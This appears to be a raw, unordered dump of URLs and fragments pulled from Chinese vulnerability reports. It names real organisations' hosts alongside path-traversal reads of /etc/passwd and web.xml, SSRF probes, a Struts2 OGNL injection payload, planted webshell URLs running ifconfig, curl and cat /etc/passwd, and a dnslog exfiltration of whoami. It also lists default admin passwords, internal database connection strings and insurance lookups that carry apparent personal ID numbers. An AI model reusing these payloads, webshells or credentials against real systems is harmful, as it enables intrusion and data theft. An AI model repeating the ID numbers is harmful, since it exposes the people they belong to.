http://service.weibo.com/share/share.php?appkey=872034675&content=utf-8&url=http://fuzz.wuyun.org/hello?world&title=wyssrf&pic= https://vpn.caissa.com.cn/por/login_psw.csp?rnd=0.16235555938372026#https%3A%2F%2Fvpn.caissa.com.cn%2F http://www.github.com http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action www.welltang.com http://118.194.40.105/ http://service.tools.medlive.cn/drugref/drugref/drug_info.do?id=12850 http://club.youku.com/ https://220.178.49.222 http://app.airchina.com.cn下载“高管驾驶舱” cn:8001 http://**.**.**/ http://**.**.**/bea_wls_internal/1.jsp jdbc:oracle:thin:@10.106.0.13:1521:tclcss http://**.**.**.**:8089/../../../../../../../../etc/passwd http://**.**.**.**/%c0%ae/WEB-INF/web.xml http://css.tclac.com/console/login/LoginForm.jsp http://css.tclac.com/jspspy/jspspy.jsp http://60.28.217.180:8040/ http://**.**.**.**/,想说像这种站应该安全防护会很不错,毕竟涉及到定位什么的但是简单看了一下,感觉网站本身做的好像并不怎么样,当然现在只是感觉,要不证实一下? http://**.**.**.**/login.jsp http://mail.anyolife.com/jsoa/login.jsp http://123.126.34.82:7777/ http://123.126.34.82:7777/ca/ma3.jsp jdbc:oracle:thin:@192.168.7.19:1521:orcl http://120.27.81.219:8080/api/ms-guide/v1/hospitals/departs/real?APPOINT_SOURCE=0&APP_UUID=4ea0bb0a-cb21-4848-98b5-8ee4c77a6036&CHANNEL_ID=1&cityCode=123&diseaseName=天花&hospitalID=&IMEI_ID=7505363B-8438-435F-8917-85C3BBD19D17&isLogin=true&juniorCode=11&juniorName=感染科|&loc=c&operateCurrent_UserId=11299681&operateUserSource=0&opVersion=2.2.01&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=9.3.2&provinceCode=0&PUBLIC_SERVICE_TYPE=0&QY_CHECK_SUFFIX=d1f4d23a30fed8f7aa9a8a2a2d30f457&USER_ID=11299681&USER_VS_ID=14374450 jdbc:oracle:thin:@**.**.**.**:1521:devdb http://i.liebao.cn/index.html http://**.**.**/ http://**.**.**/index/indexTest.jsp http://**.**.**/cacti/plugins/weathermap/editor.php http://**.**.**/cacti/plugins/weathermap/configs/wooy1n.php http://www.kaixin001.com/set/logo.php http://api.medlive.cn/user/get_push_info.php?apns_token=a1d0a3407e068cee108b0072e8dcdab36bf7e05ce542a3fbf7b3794b3bfe3da5&appid=com.kingyee.medlive.iphone&device_type=apple&device_version=9.3.2&medlive_user_id=2561346&token=689238C8-AD5C-40AD-9FA5-4512800145C6&version=3.2.1 http://**.**.** http://**.**.**/bea_wls_internal/1.jsp http://jf.cmbchina.com http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852550&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852450&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852449&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852446&Item=192228&action=show http://202.198.17.226:8088/oa/index.php http://www.towabank.co.jp/index.asp http://www.towabank.co.jp/index.asp jdbc:oracle:thin:@**.**.**.**:1521:orcl http://passport.feng.com/index.php?r=user/register https://github.com/siming1022/ems-dataload/blob/d283c3c76a2b42737214d10821831b7ecf9c58cf/ems-dataload-consumer/src/main/resources/dataSource.xml http://i.youku.com/u/setting/base_avatar.html http://i.yonyou.com,造成信息泄露 http://permalink.gmane.org/gmane.comp.security.oss.general/19669 jdbc:oracle:thin:@**.**.**.**:1521/orcl http://**.**.**.**/eOrder/getOrderList.action http://control.blog.sina.com.cn/admin/article/article_add.php xxxxx.dnslog.link/?whoami=`whoami http://vi.travel.sina.com.cn/vision/upload.php http://**.**.**.**/ http://**.**.**.**/browser.jsp?u=wanyong http://**.**.**.**/helpss.jsp http://**.**.**.**/test.txt http://club.news.sina.com.cn/post.php?action=newthread&fid=11 http://my.oschina.net/u/2393235/blog/684599 http://www.jkwin.com.cn/ams/pages/web/findpwd/findpwd1.jsp2 http://211.150.65.47:40001 http://211.150.65.47/ens/cssroot.jsp http://wooyun.org/bugs/wooyun-2010-0205600 http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate= http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/ http://www.oppo.com/ http://store.oppomobile.com/ http://zhushou.oppo.com/ http://yun.oppo.com/login http://www.oppo.cn/ http://www.coloros.com http://**.**.**.**/manage/admin.aspx http://www.dtdream.com/pub/e_card/00001.html http://monitor.dtdream.com http://pms.dtdream.com/coop/login/loginProcess/ http://pms.dtdream.com/test.php http://www.atime.co.jp,存在注入的网址:http://www.atime.co.jp/shop.php?sid=1 http://www.atime.co.jp/shop.php?sid=1 www.jkwin.com.cn http://www.jkwin.com.cn/ystpatient2.3/part.do?method=getJbPageByPartId&true=doJsonp_cfcc9621_553d_46cb_8b7b_909f8f148fd9&pageNo=1&partId=2&searchStr=-1&functionName=doJsonp_cfcc9621_553d_46cb_8b7b_909f8f148fd9&_=1464676214454 http://**.**.**.**/login.do http://**.**.**/album/h/xinQingViewid=8&device=&user_id=418923 http://drops.wooyun.org/papers/15589 http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/ http://open.wandoujia.com/account/info http://app.finance.ifeng.com/wgsearch/index.php?code=600234&begin=2016-03-05&end=2016-05-31&organ=中国证券监督管理委员会 http://2.fengniao.com/goods/add?cate_id=115&subcate_id=1057&brand_id=0&model_id=0&modelseries_id=0&type=0&_confirm=1 https://wm.cib.com.cn http://yin.fengniao.com/?do=Create/Calendar&type=2#4020 http://yin.fengniao.com/?do=Ajax/Calendar&a=fileUpload&productId=2&productionId=4020 http://store.highglass.cn/index.php/admin/orders/orderinfo/ordercode/HJ20160531TXNBI.html http://store.highglass.cn/index.php/admin/index/index.html http://store.highglass.cn/index.php/admin/orders/orderinfo/ordercode/HJ20160531TXNBI.html http://**.**.**.**/si/portal/register.jsp http://**.**.**.**/login https://zhangdan.**.**.**.**/sessions/new?service=http%3A%2F%2Fzhangdan.**.**.**.**%2F http://slide.toutiao.com/提供给开发者开发自己的模板,然后上传发布给其他人使用 http://slide.toutiao.com/preview/desktop/574c268cefcd450333315c57 https://**.**.**.** http://www.cet.sgcc.com.cn/sites/zdzb/contentCritic.jsp POST:ChildWebID=zdzb&currPage=1&pageSize=15 http://www.benhayak.com/2015/06/same-origin-method-execution-some.html。我的例子在chrome下只要访问我的页面就中招,不用再点一次去绕过chrome的popup http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.method http://weibo.com/277634777 http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.document.body.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.click http://www.e-chinalife.com/product/benefitshow/indexlis.jsp?RiskCode=415 http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\downloadToHTML.jsp&titleDoc=1 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=1 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89720 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89721 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89722 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=100282 http://xinpan.zzhz.zjol.com.cn/djgfczx/ http://xinpan.zzhz.zjol.com.cn/faqcont.zzhz?param=doSelect http://xinpan.zzhz.zjol.com.cn/images/faq/mian.html http://bangong.xcar.com.cn/Admin/index.php?s=/Public/login http://pan.baidu.com/share/home?uk=3257785095#category/type=0 http://pan.baidu.com/s/1cFRWJk http://www.69xiu.com/rank http://111.202.107.86:8080/ http://111.202.107.86:8080/user/gang.hu/configure http://111.202.107.86:8080/user/wangze/configure www.welltang.com http://share.v.t.qq.com http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://wuyun.org http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://fuzz.wuyun.org:22 http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://www.baidu.com www.baidu.com\/img\/baidu_sylogo1.gif"],"title":"\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053 http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://fuzz.wuyun.org:8888 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503641 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503642 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503642 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503643 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605012014320721000090&printNo=320721198507021814&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryListNew&type=queryClaim&policyNo=605012015350000000161&printNo=350126197611062712&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072014330314001508&printNo=412724198612068350&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=accidentstrongProposalOld&policyNo=628082015370708006901&printNo=370728196807303666&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605072015370785001454&printNo=370727197404028119&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 https://github.com/Vonwey/oa.com/blob/69e8e9a7ee0c5e60097dc568d00f9a92b41c4355/app/config/development/mail.yaml http://61.233.8.174:7002 http://61.233.8.174:7002/console/ jdbc:oracle:thin:@172.24.3.31:1521:cmmsdb1 http://182.92.82.171:8088/seeyon/index.jsp http://182.92.82.171:8088/seeyon/services/authorityService?wsdl http://182.92.82.171:8088/seeyon/services/personService?wsdl http://game.weibo.com http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888 ip:42.96.131.200 http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?data=helo.jpg[/img http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?s=dict%26ip=fuzz.wuyun.com%26port=8080%26data=helo.jpg[/img http://fss.medlive.cn/?ac=check&type=email&email=* http://dic.medlive.cn/common/ajax.inc.php http://refer.medlive.cn/common/ajax.inc.php http://mbsjt.medlive.cn/sci/searchCourse/more-course http://manhua.weibo.com/space/upload_comic http://www.dgguoyao.com http://www.dgguoyao.com/show.asp?id=228 http://www.dgguoyao.com/zibu2.asp?id=567 http://www.dgguoyao.com/xiazai.asp?anclassid=30 http://www.dgguoyao.com/heshow.asp?id=628 http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/services/ http://cos.sto.cn/services/MobileService?wsdl http://www.4008118228.cn/index.shtml http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/ http://www.doc88.com/p-9038154069569.html http://git.747.cn/users/sign_in http://git.747.cn/zhangxuan/heimilink_api/blob/master/heimi_api%20interface.txt http://miyu.apps.ibaihe.com/user/update http://www.jkwin.com.cn/ams/pages/web/register.jsp http://www.jkwin.com.cn/ams/pages/web/findpwd/findpwd1.jsp http://www.camera360.com/ url:http://125.210.141.30:8080/manager/html user:admin pass:123456 http://125.210.141.30:8080/nettv/ https://aq.qq.com/cn2/manage/mobile/confirm_number_sel?source_id=2849%C2%A0 https://console.qcloud.com/ http://www.i21st.cn/u/forgetpassword_w.php www.jkwin.com.cn http://www.jkwin.com.cn/ystpatient2.3/callR.do?functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&method=getQuery&patientId=1&patientName=%E8%8B%8F%E8%81%94&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502 http://www.jkwin.com.cn/ystpatient2.3/callR.do?method=getQuery&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&patientId=5577546766&patientName=%E8%8B%8F%E8%81%94&functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502 www.jkwin.com.cn https://github.com/joejiaogithub/repo_gionee_meet/blob/9915900effad0ace3917e62a242b0a0515006cc1/meeting/src/meet/you/MainActivity.java http://182.18.63.104:82/login.php?action=login http://www.jkwin.com.cn/ams/sso.do?ticket=FA1FAB154D1F4F83B24F409864994CB3&logonAcct=1 http://www.jkwin.com.cn/ams/logon.do?method=register http://tjat.damai.cn/phpstat.tar.gz jdbc:oracle:thin:@**.**.**.**:1521/rtdb http://**.**.**/iecrs/ http://**.**.**/bea_wls_internal/ceshi.jsp jdbc:oracle:thin:@localhost:1521:orcl http://m7lrv.blog.expnet.cn http://www.tangscan.com/plugins http://wx.jumei.com/User/doBind http://**.**.**.**/papers/64)的有如下3个: http://**.**.**.**/login/login.jsp http://**.**.**/_ http://fight.gamebbs.qq.com http://qqhx.gamebbs.qq.com http://bbs.digi.qq.com http://bbs.write.qq.com http://ff.gamebbs.qq.com http://bbs.baby.qq.com http://myhn.qq.com http://bbs.e.qq.com http://tpai.qq.com http://bbs.fanli.qq.com http://bbs.house.qq.com http://xia.gamebbs.qq.com http://bbs.cb.qq.com http://bbs.ac.qq.com http://club.auto.qq.com http://bbs.open.qq.com http://shouyou.qq.com http://bbs.im.qq.com http://qqbattle.gamebbs.qq.com http://nz.gamebbs.qq.com http://xx.gamebbs.qq.com http://xb.gamebbs.qq.com http://bbs.m.qq.com http://forum.discuz.qq.com http://bbs.cd.qq.com http://myln.qq.com http://ktv.gamebbs.qq.com http://gf.gamebbs.qq.com http://bbs.xian.qq.com http://gamebbs.qq.com http://ppjz.gamebbs.qq.com http://dm.gamebbs.qq.com http://ffo.gamebbs.qq.com http://sg.gamebbs.qq.com http://xb.qq.com http://bbs.zt.qq.com http://mygd.qq.com http://xj.gamebbs.qq.com http://xb.qq.com:8080 http://bbs.gj.qq.com http://bbs.vip.qq.com http://bbs.sports.qq.com http://bbs.weiqi.qq.com http://lol.gamebbs.qq.com http://bbs.finance.qq.com http://d2.gamebbs.qq.com http://fs.gamebbs.qq.com http://myfj.qq.com http://mysh.qq.com http://ch.gamebbs.qq.com http://qqxy.gamebbs.qq.com http://codol.gamebbs.qq.com http://ava.gamebbs.qq.com http://fo.gamebbs.qq.com http://bbs.lol.qq.com http://wang.gamebbs.qq.com http://bbs.games.qq.com http://bbs.omd.qq.com http://tps.gamebbs.qq.com http://tiantang2.gamebbs.qq.com http://qqgame.gamebbs.qq.com http://bbs.yun.qq.com http://yl.gamebbs.qq.com http://bbs.wifi.qq.com http://bns.gamebbs.qq.com http://nba2k.gamebbs.qq.com http://bbs.blog.qq.com http://r2.gamebbs.qq.com http://bbs.open.t.qq.com http://ld2.gamebbs.qq.com http://yu.gamebbs.qq.com http://qgamepailei.gamebbs.qq.com http://hao.wsq.qq.com http://c9.gamebbs.qq.com http://ss.gamebbs.qq.com http://hxsj.gamebbs.qq.com http://bbs.xg.qq.com http://x52.gamebbs.qq.com http://bbs.book.qq.com http://9j.gamebbs.qq.com http://speed.gamebbs.qq.com http://djt.qq.com http://qyzs.gamebbs.qq.com http://bbs.auto.qq.com http://myhb.qq.com http://code.qq.com http://bbs.tech.qq.com http://wf.gamebbs.qq.com http://daoju.gamebbs.qq.com http://qqbaby.gamebbs.qq.com http://dzs.gamebbs.qq.com http://bbs.lady.qq.com http://bbs.kid.qq.com http://bbs.browser.qq.com http://dnf.gamebbs.qq.com http://s3.gamebbs.qq.com http://sl.gamebbs.qq.com http://woz.gamebbs.qq.com http://bbs.edu.qq.com http://bbs.fj.qq.com http://qqtang.gamebbs.qq.com http://xxz.gamebbs.qq.com http://bbs.pcmgr.qq.com http://myxian.qq.com http://xiaoyuan.qq.com http://mycd.qq.com http://cf.gamebbs.qq.com http://ug.qq.com http://myzj.qq.com http://bbs.meishi.qq.com http://bbs.astro.qq.com http://7.gamebbs.qq.com http://3366.gamebbs.qq.com http://meng.gamebbs.qq.com http://baoshi.gamebbs.qq.com http://bbs.guanjia.qq.com http://mo.gamebbs.qq.com http://bbs.cf.qq.com http://bbs.gd.qq.com http://bbs.comic.qq.com http://vr.qq.com http://mycq.qq.com http://tiantang.gamebbs.qq.com http://bbs.map.qq.com http://cheng.gamebbs.qq.com http://tnt.gamebbs.qq.com http://myhenan.qq.com http://xy.gamebbs.qq.com http://h2.gamebbs.qq.com http://bbs.show.qq.com http://bbs.wan.qq.com http://bbs.ent.qq.com http://qqsh.gamebbs.qq.com http://mama.kid.qq.com http://bbs.cq.qq.com http://bbs.qt.qq.com http://age.gamebbs.qq.com http://bbs.fashion.qq.com http://bbs.v.qq.com http://bbs.mail.qq.com http://bbs.ms.qq.com http://pet.gamebbs.qq.com http://bl.gamebbs.qq.com http://bbs.hb.qq.com http://x.gamebbs.qq.com http://bbs.tgp.qq.com http://hon.gamebbs.qq.com http://jh.gamebbs.qq.com http://zg.gamebbs.qq.com https://xb.qq.com http://9.gamebbs.qq.com http://bbs.shang.qq.com http://ye.gamebbs.qq.com http://bbs.news.qq.com http://bbs.qa.qq.com http://bbs.chuangshi.qq.com http://x5.gamebbs.qq.com http://120.236.166.135:3333/uploads/uploads.tar http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action http://222.187.127.174:8081/ github:https://github.com/huacnlee/carrierwave-aliyun/blob/1a61840a44a66c8fc3da9ce908b4f94b4a8cd187/spec/spec_helper.rb http://218.29.137.248:7001/ http://218.29.137.248:7001/bea_wls_internal/1.jsp http://218.17.205.91:7003/page/frame/login.jsp http://218.17.205.91:7003/manager/html http://218.17.205.91:7003/is/index.jsp http://218.17.205.91:7003/is http://218.17.205.91:7003/is/index.jspx http://218.17.205.91:7003/is/test.jsp?o=vLogin khbslx:K,khbs:005144,jymm:111111,xjymm:111111,wldz khbslx:K,khbs:005144,jymm:111111,mode:,wldz khbslx:CUST,khbs:012540 khbslx:CUST,khbs:012540,zqbslx:,zqbs:,gdms:,cxlx khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:,gdms:1,cdms:1 khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:4315265,gdms khbslx:K,khbs:005144,htxh:,cxms zjzh:005144 khbslx:K,khbs:018324,gdms:2,zqbslx:,zqbs:,qsrq:2001-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:005144,gdms:,jysdm p_gybh:1,p_gnbh:28104201,p_czzd:1,p_kzcs:,p_gymm:AEIFCAJEOIACHCGCCGLI,wjbh:- sfmb:1,dwbh:-1,qsjzrq:19900101,zzjzrq:20201231,wjzt:,wjlx:-1,sfxypf:,zxwts:-1,zdwts:-1,zxwjzf:-1,zdwjzf:- ksrq:19900101,jsrq:20201231,sfgl:-1 oper_type:1,lsh:1696,desip:127.0.0.1,file_name:filename oper_type:1,lsh:1696,file_name:filename p_gybh:1,p_gnbh:14290040,p_czzd:,p_kzcs:,p_gymm:,bzbh:-1,fzzt:-1 p_gybh:1,p_gnbh:40418510,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs:,istmp:1,lsh:101,tsl field_int01:1,field_int02:1,field_int03:1,field_int04:1,field_int05:1,field_int06:1,field_int07:1,field_int08:1,field_int09:1,field_i qsrq:20100910,tjlx:3,p_czzd:127.0.0.1,zzrq:20100910,PageCount:25,p_kzcs:,isPerPage:true,hjlx:- PageOffset:0,p_gybh:1,p_gnbh:14250010,ygbhlx:1,dfhm:,mtlx:-1,p_gymm:AEIFCAJEOIACHCGCCGLI,khbh:- p_gybh:1,p_gnbh:40418401,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs sjlySQL:select kzbs:d,bz:d,p_kzcs:,p_gybh:1,p_gnbh:19100002,p_czzd:127.0.0.1,p_gymm:AEIFCAJEOIACHCGCCGLI zzkhrq:30001231,khzzh:13,lxdz:,p_fyqs:1,khzt:,sr1:,p_gybh:1,csrq1:,khxm:4,khbh:- p_sfbz:0,jgid:,p_fyhs:10,zjlx:- p_czzd:127.0.0.1,sr2:,zjhm:,qskhrq:19491001,lxhm:,bz:,p_kzcs:,p_pxzd:,p_gnbh:13990006,sfkzqx:1,khjb2:,yzbm p_gymm:AEIFCAJEOIACHCGCCGLI http://www.ms-zj.com.cn/login.shtml http://notify.oupeng.com/notify http://xxx.dnslog.info/oupeng http://210.38.58.25:8080/opac/search_rss.php?location=ALL&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= http://210.38.57.36:8081/infolist.aspx?itc=4bafb777-faa5-42a0-b05a-8e36e8737bfd http://210.38.57.36:8083/infolist.aspx?itc=462828B3-9CBD-4F02-A336-45B7A31A6581 http://210.38.57.36:8082/infolist.aspx?itc=401aeb70-6a42-44db-8447-0ccc3918b527 http://210.38.57.36:8082/info.aspx?ID=103 http://210.38.57.36:8083/info.aspx?id=135 http://210.38.57.36:8084/infolist.aspx?itc=210808cd-6be8-4108-b54c-cf095c16c011 http://210.38.57.36:8084/info.aspx?ID=305 http://123.206.77.131:8080/ http://180.167.72.216:89 http://im.guodu.com:9090中, http://111.205.160.129:9090/report www.guazi.com www.i21st.cn http://211.151.59.27:80/axis2/axis2-admin/login admin:axis2 http://**.**.**/ http://120.132.85.22/catch/channel http://shleju.w114.mc-test.com:80/ http://staff.guazi.com/ http://wuxian.guazi.com/web/#/app http://jr.bc.guazi.com/ http://223.203.210.213/ http://touch.qunar.com/ http://www.state-dr.com/productdisplay.php?sortid=112 index.php/welcome/index http://202.98.213.133/ http://**.**.**.**/sqh/business/list.html?kindid=328b52a5eb624de68580b3a6119ec4ac&name=3&nowpage=2 http://118.26.57.34/letv_bao/system/login https://github.com/suntinghui/BaiFuTongApp/blob/ea45f886332348aa871cd18204029f086d338e22/BaiFuTongApp/Source/Controller/SuggestionBackViewController.m http://renwen.njfu.edu.cn/admin/Admin_Login.asp http://**.**.**.**/bugs/wooyun-2016-0220585 http://**.**.**.**/sqh/business/newsinfo.html?nid=945 http://**.**.**.**/sqh/helpinfo.html?nid=f9baf9f15e01 http://**.**.**/_ http://*.*.*.*/job/1/configure git:https://github.com/chsfuture/yotta_web/blob/7e4a27dd922da31eb8301391276eaea650ef5182/conf/heka/template_hekad_daemon.toml http://person.sac.net.cn/pages/login/downloadFile.action?inputPath=WEB-INF/web.xml&fileName=1.docl http://person.sac.net.cn/pages/login/downloadFile.action?inputPath=WEB-INF%2Fclasses%2FapplicationContext.xml&fileName=1.docl http://www.thfund.com.cn/ http://www.thfund.com.cn//thfund/fundlist/search/api/?word=e http://person.sac.net.cn/pages/sacinfo/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf http://person.sac.net.cn/pages/registration/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf http://www13.chinacache.com:9000/jmx-console/ http://g.1905.com/index.php?m=Home&c=newsdetail&a=index&id=1514 http://yule.kuwo.cn/ http://kappa.kuwo.cn/ http://huodong.kuwo.cn/ http://album.kuwo.cn/ http://playlist.kuwo.cn/ http://play.kuwo.cn/ http://changba.kuwo.cn/ http://www.kuwo.cn/ http://tupian.kuwo.cn/ http://hbtv.kuwo.cn/ http://gxtv.kuwo.cn/ http://yinyue.kuwo.cn/ http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1 http://mcenter6-xiaop.ppmoney.com/statistic.php?m=Count&a=collection&type=chatjs&siteid=kf_9150&kfid=kf_9150_ISME9754_T2D_6022&guestid=kf_9150_ISME9754_guestE2194B7F-0543-7B&action=11&htmlsid=1466134524852011&chatsession=&settingid=kf_9150_1452647794846&ts=1466134525371 http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**/webservice/MuiltiExam.asmx?op=DeleteSendedKscj http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl http://**.**.**.**/DeleteSendedKscj soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/Login.aspx http://218.17.55.189/page/element/news/more.jsp?ebaseid=news&eid=1123 http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111 http://www.wooyun.org/actdo.php?action=sms&do=contactwhitehat&whitehatid=11111 http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111 http://istock.jrj.com.cn/istock.tar.gz http://istock.jrj.com.cn/%3f.jsp http://**.**.**.**/upload.rar http://yfpt.csc.com.cn:8080/km/login.dhtml http://yfpt.csc.com.cn:8080 https://github.com/jiagh/inkestreaming/blob/f47045ce6214d5adb963f380e9f55fb37be9f6c7/inke-streaming/.idea/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.txt http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012 coding:utf-8 http://stats.sc.weibo.com/stats/os?stats_id=1002&platform_id= http://live.huatu.com/Msym/index/id/49/fx/index http://180.153.223.220/seeyon/ http://180.153.223.220/seeyon/services/authorityService?wsdl http://180.153.223.220/seeyon/services/personService?wsdl http://www.hx168.com.cn/hxzq/hindex.html http://hctzxy.hx168.com.cn/customize/nwc_755_newvlms_default/login/login.aspx http://newv.com.cn/GetUserExamView Host:hctzxy.hx168.com.cn http://www.bbktel.com.cn/productDetail.php?Class_ID=1&Pro_ID=69 http://www.bbktel.com.cn/bbs/ https://account.daocloud.io/signin http://app.bilibili.com/bangumi/getVersion.ver?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23a%3D%23parameters.q%5B0%5D%2C%23c%3D%23parameters.q%5B1%5D%2C%23req%3D%23context.get%28%23a%29%2C%23b%3D%23req.getRealPath%28%23c%29%2C%23hh%3D%23context.get%28%23parameters.r%5B0%5D%29%2C%23hh.getWriter%28%29.println%28%23parameters.g%5B1%5D%2b%23parameters.u%5B0%5D%2b%23b%2b%23parameters.u%5B0%5D%2b%23parameters.g%5B0%5D%29%2C%23hh.getWriter%28%29.flush%28%29%2C%23hh.getWriter%28%29.close%28%29%2C1?%23g%3A%23request.toString&q=com.opensymphony.xwork2.dispatcher.HttpServletRequest&r=com.opensymphony.xwork2.dispatcher.HttpServletResponse&q=/&g=%3C-&g=-%3E&u=%7C http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=ifconfig http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.16 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.21 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=cat http://182.92.241.143 http://**.**.**/ http://**.**.**/bea_wls_internal/ceshi.jsp jdbc:oracle:thin:@10.5.1.167:1521:hhuat http://e.dangdang.com/media/api.go?category=TS http://e.dangdang.com/media/api.go?category=TS http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&url=http://127.0.0.1:8081/&g_tk=2109654981 http://60.212.43.251:8341/SKServer/ http://218.241.156.10:7001/jtbx http://218.241.156.10:7001/jtbx/config/uploadlicencefile.jsp http://218.241.156.10:7001/jtbx/ https://sslvpn.guazi.com/por/service.csp?rnd=jgbglohgffgobmdc http://**.**.**.**/tc/photo_details.asp?id=32 http://**.**.**.**/tc/contents.asp?id=12 post:http://**.**.**.**/tc/search.asp data:keywords:123 http://183.136.160.234:8161/ http://183.136.160.234:8161/admin/test/sex.jsp http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 